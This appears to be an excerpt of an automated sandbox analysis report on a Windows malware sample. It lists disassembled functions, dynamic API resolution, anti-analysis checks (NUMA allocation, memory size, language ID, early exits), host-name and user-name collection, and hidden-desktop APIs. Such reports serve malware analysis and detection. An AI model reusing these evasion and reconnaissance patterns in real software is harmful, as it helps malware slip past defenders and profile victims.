                            • LoadLibraryA.KERNEL32(00BF22F8,?,?,?,00D81C03), ref: 00D865FE
                            • LoadLibraryA.KERNEL32(00BF22E0,?,?,?,00D81C03), ref: 00D86610
                            • GetProcAddress.KERNEL32(75A70000,00BF2310), ref: 00D8662D
                            • GetProcAddress.KERNEL32(75290000,00BF2340), ref: 00D86649
                            • GetProcAddress.KERNEL32(75290000,00BF2388), ref: 00D86661
                            • GetProcAddress.KERNEL32(75BD0000,00BF23A0), ref: 00D8667D
                            • GetProcAddress.KERNEL32(75450000,00BE6410), ref: 00D86699
                            • GetProcAddress.KERNEL32(76E90000,00BF8DD0), ref: 00D866B5
                            • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00D866CC
                            Strings
                            • NtQueryInformationProcess, xrefs: 00D866C1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: c02f70a0123b71aac9ae9f38d7d5d6377891be33d3ff7b04d000d56b3344a4c6
                            • Instruction ID: 1ce69daa3613e85977530d3fc20e216e473b3aecd1c76c67db538ecfebf13e66
                            • Opcode Fuzzy Hash: c02f70a0123b71aac9ae9f38d7d5d6377891be33d3ff7b04d000d56b3344a4c6
                            • Instruction Fuzzy Hash: A9A172B55192089FD764DFB9EC48A2637B9F789780302851FE925C3374DBB4A811EF60
                            Function 00D81BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2141 d81bf0-d81c0b call d62a90 call d86390 2146 d81c1a-d81c27 call d62930 2141->2146 2147 d81c0d 2141->2147 2151 d81c29-d81c2f lstrcpy 2146->2151 2152 d81c35-d81c63 2146->2152 2148 d81c10-d81c18 2147->2148 2148->2146 2148->2148 2151->2152 2156 d81c6d-d81c7b GetSystemInfo 2152->2156 2157 d81c65-d81c67 ExitProcess 2152->2157 2158 d81c7d-d81c7f ExitProcess 2156->2158 2159 d81c85-d81ca0 call d61030 call d610c0 GetUserDefaultLangID 2156->2159 2164 d81cb8-d81cca call d82ad0 call d83e10 2159->2164 2165 d81ca2-d81ca9 2159->2165 2171 d81ccc-d81cde call d82a40 call d83e10 2164->2171 2172 d81ce7-d81d06 lstrlen call d62930 2164->2172 2165->2164 2166 d81cb0-d81cb2 ExitProcess 2165->2166 2171->2172 2183 d81ce0-d81ce1 ExitProcess 2171->2183 2178 d81d08-d81d0d 2172->2178 2179 d81d23-d81d40 lstrlen call d62930 2172->2179 2178->2179 2181 d81d0f-d81d11 2178->2181 2186 d81d5a-d81d7b call d82ad0 lstrlen call d62930 2179->2186 2187 d81d42-d81d44 2179->2187 2181->2179 2184 d81d13-d81d1d lstrcpy lstrcat 2181->2184 2184->2179 2193 d81d9a-d81db4 lstrlen call d62930 2186->2193 2194 d81d7d-d81d7f 2186->2194 2187->2186 2189 d81d46-d81d54 lstrcpy lstrcat 2187->2189 2189->2186 2199 d81dce-d81deb call d82a40 lstrlen call d62930 2193->2199 2200 d81db6-d81db8 2193->2200 2194->2193 2195 d81d81-d81d85 2194->2195 2195->2193 2197 d81d87-d81d94 lstrcpy lstrcat 2195->2197 2197->2193 2206 d81e0a-d81e0f 2199->2206 2207 d81ded-d81def 2199->2207 2200->2199 2201 d81dba-d81dc8 lstrcpy lstrcat 2200->2201 2201->2199 2209 d81e11 call d62a20 2206->2209 2210 d81e16-d81e22 call d62930 2206->2210 2207->2206 2208 d81df1-d81df5 2207->2208 2208->2206 2211 d81df7-d81e04 lstrcpy lstrcat 2208->2211 2209->2210 2215 d81e30-d81e66 call d62a20 * 5 OpenEventA 2210->2215 2216 d81e24-d81e26 2210->2216 2211->2206 2228 d81e68-d81e8a CloseHandle Sleep OpenEventA 2215->2228 2229 d81e8c-d81ea0 CreateEventA call d81b20 call d7ffd0 2215->2229 2216->2215 2217 d81e28-d81e2a lstrcpy 2216->2217 2217->2215 2228->2228 2228->2229 2233 d81ea5-d81eae CloseHandle ExitProcess 2229->2233
                            APIs
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BF2130), ref: 00D863E9
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BF20B8), ref: 00D86402
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BF20D0), ref: 00D8641A
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BF21D8), ref: 00D86432
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BF8D30), ref: 00D8644B
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BE6330), ref: 00D86463
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BE62D0), ref: 00D8647B
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BF2160), ref: 00D86494
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BF21F0), ref: 00D864AC
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BF2190), ref: 00D864C4
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BF2280), ref: 00D864DD
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BE6150), ref: 00D864F5
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BF2178), ref: 00D8650D
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D81C2F
                            • ExitProcess.KERNEL32 ref: 00D81C67
                            • GetSystemInfo.KERNEL32(?), ref: 00D81C71
                            • ExitProcess.KERNEL32 ref: 00D81C7F
                              • Part of subcall function 00D61030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00D61046
                              • Part of subcall function 00D61030: VirtualAllocExNuma.KERNEL32(00000000), ref: 00D6104D
                              • Part of subcall function 00D61030: ExitProcess.KERNEL32 ref: 00D61058
                              • Part of subcall function 00D610C0: GlobalMemoryStatusEx.KERNEL32 ref: 00D610EA
                              • Part of subcall function 00D610C0: ExitProcess.KERNEL32 ref: 00D61114
                            • GetUserDefaultLangID.KERNEL32 ref: 00D81C8F
                            • ExitProcess.KERNEL32 ref: 00D81CB2
                            • ExitProcess.KERNEL32 ref: 00D81CE1
                            • lstrlen.KERNEL32(00BF8DF0), ref: 00D81CEE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D81D15
                            • lstrcat.KERNEL32(00000000,00BF8DF0), ref: 00D81D1D
                            • lstrlen.KERNEL32(00D94B98), ref: 00D81D28
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D81D48
                            • lstrcat.KERNEL32(00000000,00D94B98), ref: 00D81D54
                            • lstrlen.KERNEL32(00000000), ref: 00D81D63
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D81D89
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D81D94
                            • lstrlen.KERNEL32(00D94B98), ref: 00D81D9F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D81DBC
                            • lstrcat.KERNEL32(00000000,00D94B98), ref: 00D81DC8
                            • lstrlen.KERNEL32(00000000), ref: 00D81DD7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D81DF9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D81E04
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                            • String ID:
                            • API String ID: 3366406952-0
                            • Opcode ID: 378bffae0ac01a2a52dd61c7c55ff92c242345de882ece7c7c18a9e7adcccd0a
                            • Instruction ID: c0ff9d5509fbd7ce2c8d537278af11557e565251e2bf696978694c165166325d
                            • Opcode Fuzzy Hash: 378bffae0ac01a2a52dd61c7c55ff92c242345de882ece7c7c18a9e7adcccd0a
                            • Instruction Fuzzy Hash: 7F71D03554120AABDB21BBB4DC8DB6E7BBDEF45741F09002AF906D61A1DFB09806DB70
                            Function 00D64A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2850 d64a60-d64afc RtlAllocateHeap 2867 d64afe-d64b03 2850->2867 2868 d64b7a-d64bbe VirtualProtect 2850->2868 2869 d64b06-d64b78 2867->2869 2869->2868
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D64AA3
                            • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00D64BB0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-3329630956
                            • Opcode ID: 7249e208b2667bcd72c59662087c918a9b4925d18509ba429eca02ef955e44f0
                            • Instruction ID: 5be7205fcee9796694dee6d5aac7a05313f8aa4dcf1f16e67f32edfc92bbc9ff
                            • Opcode Fuzzy Hash: 7249e208b2667bcd72c59662087c918a9b4925d18509ba429eca02ef955e44f0
                            • Instruction Fuzzy Hash: C331E429B8022D7E9F20EBEF6C47F5F6E55DF85BA0B02405A750857182C9A1560ACEF2
                            Function 00D82AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2957 d82ad0-d82b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 d82b44-d82b59 2957->2958 2959 d82b24-d82b36 2957->2959
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00D82AFF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D82B06
                            • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00D82B1A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 8375cb70160f94d0819a7e701185c380a4de4c5f4b425d2f4f2504f168851c3f
                            • Instruction ID: b99f3e09540a51bfa14732e445d7717d93cff20e7d4d52ab144234eb632a95a3
                            • Opcode Fuzzy Hash: 8375cb70160f94d0819a7e701185c380a4de4c5f4b425d2f4f2504f168851c3f
                            • Instruction Fuzzy Hash: 8301A272A44208ABD710DF99EC45BA9F7B8F744B21F00026BF915E3790D775190487A1
                            Function 00D82A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00D82A6F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D82A76
                            • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00D82A8A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: 884c2e4a5f4a7585496d80566b97c285aabf811b31feaf5e736622360c1f3afc
                            • Instruction ID: d14ee9de1d3faae2d1ce885d139710da62df0b1b9bd2ad7df576de87c53da515
                            • Opcode Fuzzy Hash: 884c2e4a5f4a7585496d80566b97c285aabf811b31feaf5e736622360c1f3afc
                            • Instruction Fuzzy Hash: 33F0B4B2A44208AFD700DF9DDD49B9EBBBCF749B21F00021BF915E3290D7B4190487A1
                            Function 00D866E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 633 d866e0-d866e7 634 d866ed-d86af9 GetProcAddress * 43 633->634 635 d86afe-d86b92 LoadLibraryA * 8 633->635 634->635 636 d86c08-d86c0f 635->636 637 d86b94-d86c03 GetProcAddress * 5 635->637 638 d86cd2-d86cd9 636->638 639 d86c15-d86ccd GetProcAddress * 8 636->639 637->636 640 d86cdb-d86d4a GetProcAddress * 5 638->640 641 d86d4f-d86d56 638->641 639->638 640->641 642 d86de9-d86df0 641->642 643 d86d5c-d86de4 GetProcAddress * 6 641->643 644 d86f10-d86f17 642->644 645 d86df6-d86f0b GetProcAddress * 12 642->645 643->642 646 d86f19-d86f88 GetProcAddress * 5 644->646 647 d86f8d-d86f94 644->647 645->644 646->647 648 d86fc1-d86fc8 647->648 649 d86f96-d86fbc GetProcAddress * 2 647->649 650 d86fca-d86ff0 GetProcAddress * 2 648->650 651 d86ff5-d86ffc 648->651 649->648 650->651 652 d870ed-d870f4 651->652 653 d87002-d870e8 GetProcAddress * 10 651->653 654 d87152-d87159 652->654 655 d870f6-d8714d GetProcAddress * 4 652->655 653->652 656 d8715b-d87169 GetProcAddress 654->656 657 d8716e-d87175 654->657 655->654 656->657 658 d871d3 657->658 659 d87177-d871ce GetProcAddress * 4 657->659 659->658
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,00BE61B0), ref: 00D866F5
                            • GetProcAddress.KERNEL32(74DD0000,00BE6250), ref: 00D8670D
                            • GetProcAddress.KERNEL32(74DD0000,00BF9450), ref: 00D86726
                            • GetProcAddress.KERNEL32(74DD0000,00BF9480), ref: 00D8673E
                            • GetProcAddress.KERNEL32(74DD0000,00BF9498), ref: 00D86756
                            • GetProcAddress.KERNEL32(74DD0000,00BF93D8), ref: 00D8676F
                            • GetProcAddress.KERNEL32(74DD0000,00BEC2A8), ref: 00D86787
                            • GetProcAddress.KERNEL32(74DD0000,00BFD320), ref: 00D8679F
                            • GetProcAddress.KERNEL32(74DD0000,00BFD308), ref: 00D867B8
                            • GetProcAddress.KERNEL32(74DD0000,00BFD2F0), ref: 00D867D0
                            • GetProcAddress.KERNEL32(74DD0000,00BFD0E0), ref: 00D867E8
                            • GetProcAddress.KERNEL32(74DD0000,00BE60D0), ref: 00D86801
                            • GetProcAddress.KERNEL32(74DD0000,00BE60F0), ref: 00D86819
                            • GetProcAddress.KERNEL32(74DD0000,00BE6130), ref: 00D86831
                            • GetProcAddress.KERNEL32(74DD0000,00BE6290), ref: 00D8684A
                            • GetProcAddress.KERNEL32(74DD0000,00BFD038), ref: 00D86862
                            • GetProcAddress.KERNEL32(74DD0000,00BFD098), ref: 00D8687A
                            • GetProcAddress.KERNEL32(74DD0000,00BEC348), ref: 00D86893
                            • GetProcAddress.KERNEL32(74DD0000,00BE61D0), ref: 00D868AB
                            • GetProcAddress.KERNEL32(74DD0000,00BFD050), ref: 00D868C3
                            • GetProcAddress.KERNEL32(74DD0000,00BFD2C0), ref: 00D868DC
                            • GetProcAddress.KERNEL32(74DD0000,00BFD068), ref: 00D868F4
                            • GetProcAddress.KERNEL32(74DD0000,00BFD080), ref: 00D8690C
                            • GetProcAddress.KERNEL32(74DD0000,00BE62B0), ref: 00D86925
                            • GetProcAddress.KERNEL32(74DD0000,00BFD0F8), ref: 00D8693D
                            • GetProcAddress.KERNEL32(74DD0000,00BFD248), ref: 00D86955
                            • GetProcAddress.KERNEL32(74DD0000,00BFD260), ref: 00D8696E
                            • GetProcAddress.KERNEL32(74DD0000,00BFD0B0), ref: 00D86986
                            • GetProcAddress.KERNEL32(74DD0000,00BFD0C8), ref: 00D8699E
                            • GetProcAddress.KERNEL32(74DD0000,00BFD110), ref: 00D869B7
                            • GetProcAddress.KERNEL32(74DD0000,00BFD170), ref: 00D869CF
                            • GetProcAddress.KERNEL32(74DD0000,00BFD1B8), ref: 00D869E7
                            • GetProcAddress.KERNEL32(74DD0000,00BFD128), ref: 00D86A00
                            • GetProcAddress.KERNEL32(74DD0000,00BFA2E8), ref: 00D86A18
                            • GetProcAddress.KERNEL32(74DD0000,00BFD2D8), ref: 00D86A30
                            • GetProcAddress.KERNEL32(74DD0000,00BFD140), ref: 00D86A49
                            • GetProcAddress.KERNEL32(74DD0000,00BE61F0), ref: 00D86A61
                            • GetProcAddress.KERNEL32(74DD0000,00BFD278), ref: 00D86A79
                            • GetProcAddress.KERNEL32(74DD0000,00BE5CB0), ref: 00D86A92
                            • GetProcAddress.KERNEL32(74DD0000,00BFD200), ref: 00D86AAA
                            • GetProcAddress.KERNEL32(74DD0000,00BFD158), ref: 00D86AC2
                            • GetProcAddress.KERNEL32(74DD0000,00BE5ED0), ref: 00D86ADB
                            • GetProcAddress.KERNEL32(74DD0000,00BE5EF0), ref: 00D86AF3
                            • LoadLibraryA.KERNEL32(00BFD188,00D8051F), ref: 00D86B05
                            • LoadLibraryA.KERNEL32(00BFD218), ref: 00D86B16
                            • LoadLibraryA.KERNEL32(00BFD230), ref: 00D86B28
                            • LoadLibraryA.KERNEL32(00BFD290), ref: 00D86B3A
                            • LoadLibraryA.KERNEL32(00BFD2A8), ref: 00D86B4B
                            • LoadLibraryA.KERNEL32(00BFD1A0), ref: 00D86B5D
                            • LoadLibraryA.KERNEL32(00BFD1D0), ref: 00D86B6F
                            • LoadLibraryA.KERNEL32(00BFD1E8), ref: 00D86B80
                            • GetProcAddress.KERNEL32(75290000,00BE5DF0), ref: 00D86B9C
                            • GetProcAddress.KERNEL32(75290000,00BFD3F8), ref: 00D86BB4
                            • GetProcAddress.KERNEL32(75290000,00BF8CF0), ref: 00D86BCD
                            • GetProcAddress.KERNEL32(75290000,00BFD3B0), ref: 00D86BE5
                            • GetProcAddress.KERNEL32(75290000,00BE5F30), ref: 00D86BFD
                            • GetProcAddress.KERNEL32(734C0000,00BEBD58), ref: 00D86C1D
                            • GetProcAddress.KERNEL32(734C0000,00BE5F10), ref: 00D86C35
                            • GetProcAddress.KERNEL32(734C0000,00BEBF38), ref: 00D86C4E
                            • GetProcAddress.KERNEL32(734C0000,00BFD410), ref: 00D86C66
                            • GetProcAddress.KERNEL32(734C0000,00BFD458), ref: 00D86C7E
                            • GetProcAddress.KERNEL32(734C0000,00BE5F50), ref: 00D86C97
                            • GetProcAddress.KERNEL32(734C0000,00BE5FD0), ref: 00D86CAF
                            • GetProcAddress.KERNEL32(734C0000,00BFD380), ref: 00D86CC7
                            • GetProcAddress.KERNEL32(752C0000,00BE5EB0), ref: 00D86CE3
                            • GetProcAddress.KERNEL32(752C0000,00BE5F70), ref: 00D86CFB
                            • GetProcAddress.KERNEL32(752C0000,00BFD428), ref: 00D86D14
                            • GetProcAddress.KERNEL32(752C0000,00BFD440), ref: 00D86D2C
                            • GetProcAddress.KERNEL32(752C0000,00BE5F90), ref: 00D86D44
                            • GetProcAddress.KERNEL32(74EC0000,00BEBD80), ref: 00D86D64
                            • GetProcAddress.KERNEL32(74EC0000,00BEBFD8), ref: 00D86D7C
                            • GetProcAddress.KERNEL32(74EC0000,00BFD350), ref: 00D86D95
                            • GetProcAddress.KERNEL32(74EC0000,00BE5E10), ref: 00D86DAD
                            • GetProcAddress.KERNEL32(74EC0000,00BE5FB0), ref: 00D86DC5
                            • GetProcAddress.KERNEL32(74EC0000,00BEBF60), ref: 00D86DDE
                            • GetProcAddress.KERNEL32(75BD0000,00BFD368), ref: 00D86DFE
                            • GetProcAddress.KERNEL32(75BD0000,00BE5CD0), ref: 00D86E16
                            • GetProcAddress.KERNEL32(75BD0000,00BF8D00), ref: 00D86E2F
                            • GetProcAddress.KERNEL32(75BD0000,00BFD338), ref: 00D86E47
                            • GetProcAddress.KERNEL32(75BD0000,00BFD4E8), ref: 00D86E5F
                            • GetProcAddress.KERNEL32(75BD0000,00BE5D50), ref: 00D86E78
                            • GetProcAddress.KERNEL32(75BD0000,00BE6030), ref: 00D86E90
                            • GetProcAddress.KERNEL32(75BD0000,00BFD4B8), ref: 00D86EA8
                            • GetProcAddress.KERNEL32(75BD0000,00BFD470), ref: 00D86EC1
                            • GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 00D86ED7
                            • GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 00D86EEE
                            • GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 00D86F05
